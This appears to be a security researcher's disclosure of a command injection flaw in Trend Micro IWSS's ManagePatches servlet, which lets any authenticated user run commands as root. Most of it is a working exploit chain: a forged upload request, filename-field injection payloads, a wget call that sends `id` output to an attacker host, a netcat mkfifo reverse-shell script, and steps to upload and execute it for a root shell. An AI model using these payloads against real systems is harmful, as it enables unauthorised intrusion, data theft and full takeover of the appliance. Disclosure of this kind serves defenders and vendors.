The com.trend.iwss.gui.servlet.ManagePatches servlet contains a flaw allowing any authenticated user (including ‘Report Only’ users) to execute commands under the context of the root user.
The com.trend.iwss.gui.servlet.ManagePatches servlet is used by elevated privilege users to upload files (patches). The functionality, however, can be used by any authenticated user simply by substituting their cookie into the request (below is a sample of the stripped down valid request).
POST /servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload HTTP/1.1
Host: <server IP>:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept-Encoding: gzip, deflate
Referer: https://<server IP>:8443/admin_patch_mgmt2.jsp?CSRFGuardToken=MQG8WJXIT4J8GASYYA7OVCXXBKUIGG5D
Cookie: JSESSIONID=<INSERT COOKIE VALUE HERE>
Content-Type: multipart/form-data; boundary=—————————141658507810329061771972399818
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml”
The actual injection takes place in the name of the file being uploaded. By performing the following tests, the delay in responses indicates that command execution is occurring.
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml&ping 127.0.0.1 -c 10″
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml&ping 127.0.0.1 -c 30″
This gives any user the ability to execute simple non interactive commands. However, more complex (including remote shell) are possible.
By issuing a ‘wget <ip>’ of the attacker machine, a response is seen. However, exfiltrating information a bit more tricky. Special characters like ‘/’,'<‘,’>’ are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the ‘/’. Below is an example of a user running a wget to retrieve the current user using the given command (where [ip address] is your receiving machine):
filename=”test.xml&wget `echo [ip address]“echo $PATH | cut -c1“id`”
EXPLANATION: using ` (or even $()) to escape, it is possible to pull the ‘/’ character from the current $PATH and insert it into the command, creating the full wget of [ip address]/`id`
Apache Log –
This grants the ability to exfiltrate some data, as well as upload (via wget) files.
Now the attacker has the ability to create a shell by uploading a file containing the following:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f
To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:
test.xml&wget `echo [ip address]“echo $PATH | cut -c1`shell
Once the file has been uploaded (will be placed in the /var/iwss/patch/bin folder), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:
test.xml&chmod a+x shell
test.xml&.`echo $PATH | cut -c1`shell